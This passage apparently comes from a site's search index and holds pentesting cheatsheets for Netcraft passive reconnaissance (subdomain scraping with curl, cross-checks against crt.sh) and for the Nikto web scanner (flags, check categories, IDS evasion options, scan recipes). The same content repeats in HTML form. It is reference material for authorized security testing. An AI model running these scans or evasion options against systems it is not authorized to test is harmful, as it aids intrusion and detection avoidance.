Free site-report lookups; subdomain search; commercial APIs for bulk.\nAccess Points Surface URL Site Report (single site) https://sitereport.netcraft.com/?url= Subdomain / Domain search https://searchdns.netcraft.com/ What\u0026rsquo;s that site running? (legacy) https://toolbar.netcraft.com/site_report?url= Phishing / takedown reporting https://report.netcraft.com/ Anti-phishing browser extension https://www.netcraft.com/apps/ Quick Lookups (URL-style) # Site Report xdg-open \u0026#34;https://sitereport.netcraft.com/?url=https://target.tld\u0026#34; # Subdomain search (DNS knowledge, not zone transfer) xdg-open \u0026#34;https://searchdns.netcraft.com/?host=*.target.tld\u0026#34; # Scrape subdomain list (HTML — fragile, format may change) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \\ \u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=target.tld\u0026#34; \\ | grep -oE \u0026#39;[a-zA-Z0-9.-]+\\.target\\.tld\u0026#39; | sort -u What the Site Report Reveals Background: site title, description, language, first-seen date Network: IPv4/IPv6, ASN, netblock owner, hosting country, nameservers, reverse DNS Hosting history: OS, web server, hosting provider, IP changes over time (often years) SSL/TLS: certificate issuer, valid-from / valid-to, signature alg, key size, full chain Web trackers: analytics, ad networks, tag managers Site technologies: server-side language, CMS, JS frameworks (similar surface to Wappalyzer/WhatWeb but historical) Risk rating: Netcraft\u0026rsquo;s own risk scoring (popularity, reputation, phishing flags) OSINT Pivots Hosting history → identify legacy IPs that may still serve content (origin behind CDN, forgotten staging). SSL history → past CN / SAN entries leak retired subdomains and internal hostnames. Same nameservers + hosting across multiple sites → infrastructure attribution. First-seen date → useful for triaging suspicious / typosquat domains. 
Subdomain Discovery https://searchdns.netcraft.com/?host=*.target.tld Returns publicly known hosts under a domain. Complement, do not replace, [[crt.sh]] / amass / subfinder — Netcraft sees long-tail hosts those miss, and vice versa. Free tier paginates and rate-limits aggressively; expect a CAPTCHA on bulk. Workflow Example DOMAIN=target.tld # 1. Open Site Report xdg-open \u0026#34;https://sitereport.netcraft.com/?url=https://$DOMAIN\u0026#34; # 2. Pull subdomain list (best-effort scrape) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \\ \u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=$DOMAIN\u0026#34; \\ | grep -oE \u0026#34;[a-zA-Z0-9.-]+\\.$DOMAIN\u0026#34; | sort -u \u0026gt; netcraft-subs.txt # 3. Cross-check with crt.sh curl -s \u0026#34;https://crt.sh/?q=%25.$DOMAIN\u0026amp;output=json\u0026#34; \\ | jq -r \u0026#39;.[].name_value\u0026#39; | tr \u0026#39;,\u0026#39; \u0026#39; \u0026#39; | sort -u \u0026gt; crtsh-subs.txt # 4. Merge sort -u netcraft-subs.txt crtsh-subs.txt \u0026gt; all-subs.txt Browser Extension Netcraft\u0026rsquo;s anti-phishing extension shows live Site Report data inline:\nSite rank, hosting country, ASN owner Risk rating + phishing flag status One-click jump to full Site Report Useful during engagement scoping to confirm asset ownership without sending packets.\nTips Fully passive — target sees nothing. Hosting/OS history is Netcraft\u0026rsquo;s killer feature; nothing else has the same time depth. Site Report\u0026rsquo;s \u0026ldquo;Hosting history\u0026rdquo; can date origin migrations — handy for finding pre-CDN IPs. Subdomain search is incomplete on its own; pair with CT logs and bruteforce. Free use is rate-limited; for bulk/automation, look at Netcraft\u0026rsquo;s commercial Threat Intelligence APIs. Related [[builtwith]] — historical tech stack overlap (less infra, more app-layer). [[wappalyzer]] — current tech only, browser-side. 
[[whatweb]] — active CLI fingerprinting if you need ground truth. [[wafw00f]] — pair Site Report (hosting) with WAF fingerprint for full edge picture. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/netcraft/","summary":"\u003ch1 id=\"netcraft-cheatsheet\"\u003eNetcraft Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Passive reconnaissance — hosting history, OS / web server history, SSL certificate history, site report, and subdomain discovery for a target domain. Uses Netcraft\u0026rsquo;s long-running internet survey, so no traffic touches the target.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFormat:\u003c/strong\u003e Web service. Free site-report lookups; subdomain search; commercial APIs for bulk.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"access-points\"\u003eAccess Points\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSurface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eURL\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSite Report (single site)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://sitereport.netcraft.com/?url=\"\u003ehttps://sitereport.netcraft.com/?url=\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSubdomain / Domain search\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://searchdns.netcraft.com/\"\u003ehttps://searchdns.netcraft.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eWhat\u0026rsquo;s that site running? 
(legacy)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://toolbar.netcraft.com/site_report?url=\"\u003ehttps://toolbar.netcraft.com/site_report?url=\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ePhishing / takedown reporting\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://report.netcraft.com/\"\u003ehttps://report.netcraft.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAnti-phishing browser extension\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.netcraft.com/apps/\"\u003ehttps://www.netcraft.com/apps/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"quick-lookups-url-style\"\u003eQuick Lookups (URL-style)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Site Report\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://sitereport.netcraft.com/?url=https://target.tld\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Subdomain search (DNS knowledge, not zone transfer)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan 
style=\"color:#e6db74\"\u003e\u0026#34;https://searchdns.netcraft.com/?host=*.target.tld\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scrape subdomain list (HTML — fragile, format may change)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=target.tld\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  | grep -oE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;[a-zA-Z0-9.-]+\\.target\\.tld\u0026#39;\u003c/span\u003e | sort -u\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"what-the-site-report-reveals\"\u003eWhat the Site Report Reveals\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBackground:\u003c/strong\u003e site title, description, language, first-seen date\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNetwork:\u003c/strong\u003e IPv4/IPv6, ASN, netblock owner, hosting country, nameservers, reverse DNS\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHosting history:\u003c/strong\u003e OS, web server, hosting provider, IP changes over time (often years)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSL/TLS:\u003c/strong\u003e certificate issuer, valid-from / valid-to, signature alg, key size, full 
chain\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWeb trackers:\u003c/strong\u003e analytics, ad networks, tag managers\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSite technologies:\u003c/strong\u003e server-side language, CMS, JS frameworks (similar surface to Wappalyzer/WhatWeb but historical)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRisk rating:\u003c/strong\u003e Netcraft\u0026rsquo;s own risk scoring (popularity, reputation, phishing flags)\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"osint-pivots\"\u003eOSINT Pivots\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHosting history\u003c/strong\u003e → identify legacy IPs that may still serve content (origin behind CDN, forgotten staging).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSL history\u003c/strong\u003e → past CN / SAN entries leak retired subdomains and internal hostnames.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSame nameservers + hosting\u003c/strong\u003e across multiple sites → infrastructure attribution.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFirst-seen date\u003c/strong\u003e → useful for triaging suspicious / typosquat domains.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"subdomain-discovery\"\u003eSubdomain Discovery\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ehttps://searchdns.netcraft.com/?host=*.target.tld\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eReturns publicly known hosts under a domain.\u003c/li\u003e\n\u003cli\u003eComplement, do not replace, [[crt.sh]] / \u003ccode\u003eamass\u003c/code\u003e / \u003ccode\u003esubfinder\u003c/code\u003e — Netcraft sees long-tail hosts those miss, and vice versa.\u003c/li\u003e\n\u003cli\u003eFree tier paginates and rate-limits aggressively; expect a CAPTCHA on bulk.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"workflow-example\"\u003eWorkflow Example\u003c/h2\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDOMAIN\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003etarget.tld\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 1. Open Site Report\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://sitereport.netcraft.com/?url=https://\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 2. 
Pull subdomain list (best-effort scrape)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  | grep -oE \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;[a-zA-Z0-9.-]+\\.\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e | sort -u \u0026gt; netcraft-subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 3. 
Cross-check with crt.sh\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://crt.sh/?q=%25.\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026amp;output=json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  | jq -r \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;.[].name_value\u0026#39;\u003c/span\u003e | tr \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;,\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u003c/span\u003e | sort -u \u0026gt; crtsh-subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 4. 
Merge\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esort -u netcraft-subs.txt crtsh-subs.txt \u0026gt; all-subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"browser-extension\"\u003eBrowser Extension\u003c/h2\u003e\n\u003cp\u003eNetcraft\u0026rsquo;s anti-phishing extension shows live Site Report data inline:\u003c/p\u003e","title":"netcraft"},{"content":"Nikto Cheatsheet Purpose: Web server scanner — checks for dangerous files, outdated server software, misconfigurations, and known vulnerabilities.\nBasic Usage nikto -h \u0026lt;target\u0026gt; # Scan a target (default port 80) nikto -h https://target.tld # HTTPS target nikto -h \u0026lt;ip\u0026gt; -p 443 -ssl # Force SSL on custom port nikto -h \u0026lt;ip\u0026gt; -p 80,443,8080,8443 # Multiple ports nikto -h hosts.txt # Scan a list of targets Common Flags Flag Description -h \u0026lt;host\u0026gt; Target host, URL, or file of hosts -p \u0026lt;ports\u0026gt; Port(s) — single, list, or range -ssl Force SSL/TLS -nossl Disable SSL -root \u0026lt;path\u0026gt; Prepend root path to all requests -vhost \u0026lt;host\u0026gt; Set virtual host (Host header) -id \u0026lt;user:pass\u0026gt; HTTP Basic auth -useragent \u0026lt;ua\u0026gt; Custom User-Agent -useproxy \u0026lt;url\u0026gt; Route through proxy -Display \u0026lt;opts\u0026gt; Output verbosity flags (see below) -Format \u0026lt;fmt\u0026gt; Output format: csv, htm, txt, xml, json, sql -output \u0026lt;file\u0026gt; Write report to file -Tuning \u0026lt;ids\u0026gt; Limit checks to specific categories -Plugins \u0026lt;list\u0026gt; Run specific plugins only -evasion \u0026lt;ids\u0026gt; IDS evasion techniques -timeout \u0026lt;s\u0026gt; Per-request timeout -maxtime \u0026lt;s/m/h\u0026gt; Hard scan time limit (e.g. 
30m) -Pause \u0026lt;s\u0026gt; Pause between requests -ask no Don\u0026rsquo;t prompt to submit findings -update Update plugins / databases -list-plugins List installed plugins Output nikto -h https://target.tld -o report.html -Format htm nikto -h \u0026lt;ip\u0026gt; -o nikto.json -Format json nikto -h \u0026lt;ip\u0026gt; -o nikto.xml -Format xml nikto -h \u0026lt;ip\u0026gt; -o nikto.csv -Format csv -Display flags (combine, e.g. -Display 1V):\nID Meaning 1 Show redirects 2 Show cookies received 3 Show 200/OK responses 4 Show URLs requiring auth D Debug output E HTTP errors P Show progress S Scrub IPs from output V Verbose Tuning (Limit Check Categories) nikto -h \u0026lt;target\u0026gt; -Tuning \u0026lt;ids\u0026gt; ID Category 0 File upload 1 Interesting files / logs 2 Misconfiguration / default files 3 Information disclosure 4 Injection (XSS/HTML) 5 Remote file retrieval — inside webroot 6 Denial of Service 7 Remote file retrieval — server-wide 8 Command execution / RCE 9 SQL injection a Auth bypass b Software identification c Remote source inclusion d WebService e Administrative console x Reverse tuning (exclude listed) Examples:\nnikto -h \u0026lt;target\u0026gt; -Tuning 123b # Files, misconfig, info, fingerprint nikto -h \u0026lt;target\u0026gt; -Tuning x6 # Everything EXCEPT DoS nikto -h \u0026lt;target\u0026gt; -Tuning 9a # SQLi + auth bypass only Evasion Techniques (-evasion) ID Technique 1 Random URI encoding (non-UTF8) 2 Directory self-reference (/./) 3 Premature URL ending 4 Prepend long random string 5 Fake parameter 6 TAB as request spacer 7 Change case of URL 8 Use Windows directory separator \\ A Use carriage return (0x0d) as line terminator B Use binary value 0x0b as spacer nikto -h \u0026lt;target\u0026gt; -evasion 1234 Auth, Headers, vhost, Proxy # HTTP Basic nikto -h https://target.tld -id \u0026#39;admin:password\u0026#39; # Custom UA + custom Host (vhost test) nikto -h \u0026lt;ip\u0026gt; -vhost dev.target.tld -useragent 
\u0026#34;Mozilla/5.0 Recon/1.0\u0026#34; # Cookie-based session nikto -h https://target.tld -Header \u0026#34;Cookie: session=abcd1234\u0026#34; # Through Burp / ZAP nikto -h https://target.tld -useproxy http://127.0.0.1:8080 Proxy can also be set in nikto.conf:\nPROXYHOST=127.0.0.1 PROXYPORT=8080 Practical Recipes # Quick fingerprint + misconfig sweep, no DoS, no SQLi noise nikto -h https://target.tld -Tuning 123b -maxtime 15m -o fp.html -Format htm # Full scan against an internal app behind a non-default path nikto -h http://\u0026lt;ip\u0026gt; -p 8080 -root /app/ -o app-scan.txt # Bulk scan from a list, JSON output, throttled nikto -h targets.txt -Pause 1 -o bulk.json -Format json -ask no # SSL scan with verbose progress nikto -h target.tld -p 443 -ssl -Display PV Tips Nikto is loud — assume IDS/WAF will flag it. Use -Pause, -Tuning, and -evasion if stealth matters. Run after whatweb / wafw00f so tuning matches the detected stack. Many findings are informational; verify hits manually with curl before claiming a vuln. Use -update after install and periodically — checks are plugin-driven. For HTTPS targets that redirect from HTTP, scan both ports explicitly — Nikto won\u0026rsquo;t always follow. 
","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/nikto/","summary":"\u003ch1 id=\"nikto-cheatsheet\"\u003eNikto Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Web server scanner — checks for dangerous files, outdated server software, misconfigurations, and known vulnerabilities.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;target\u0026gt;                          \u003cspan style=\"color:#75715e\"\u003e# Scan a target (default port 80)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h https://target.tld                \u003cspan style=\"color:#75715e\"\u003e# HTTPS target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e443\u003c/span\u003e -ssl                  \u003cspan style=\"color:#75715e\"\u003e# Force SSL on custom port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -p 80,443,8080,8443          \u003cspan style=\"color:#75715e\"\u003e# Multiple ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h hosts.txt                         \u003cspan style=\"color:#75715e\"\u003e# Scan a list of targets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon 
Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-h \u0026lt;host\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget host, URL, or file of hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;ports\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePort(s) — single, list, or range\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ssl\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce SSL/TLS\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-nossl\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable SSL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-root \u0026lt;path\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrepend root path to all requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-vhost \u0026lt;host\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet virtual host (Host header)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-id \u0026lt;user:pass\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-useragent \u0026lt;ua\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom User-Agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-useproxy 
\u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRoute through proxy\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Display \u0026lt;opts\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput verbosity flags (see below)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Format \u0026lt;fmt\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format: \u003ccode\u003ecsv\u003c/code\u003e, \u003ccode\u003ehtm\u003c/code\u003e, \u003ccode\u003etxt\u003c/code\u003e, \u003ccode\u003exml\u003c/code\u003e, \u003ccode\u003ejson\u003c/code\u003e, \u003ccode\u003esql\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-output \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite report to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Tuning \u0026lt;ids\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLimit checks to specific categories\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Plugins \u0026lt;list\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun specific plugins only\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-evasion \u0026lt;ids\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIDS evasion techniques\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePer-request timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-maxtime 
\u0026lt;s/m/h\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHard scan time limit (e.g. \u003ccode\u003e30m\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Pause \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePause between requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ask no\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDon\u0026rsquo;t prompt to submit findings\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-update\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUpdate plugins / databases\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-list-plugins\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList installed 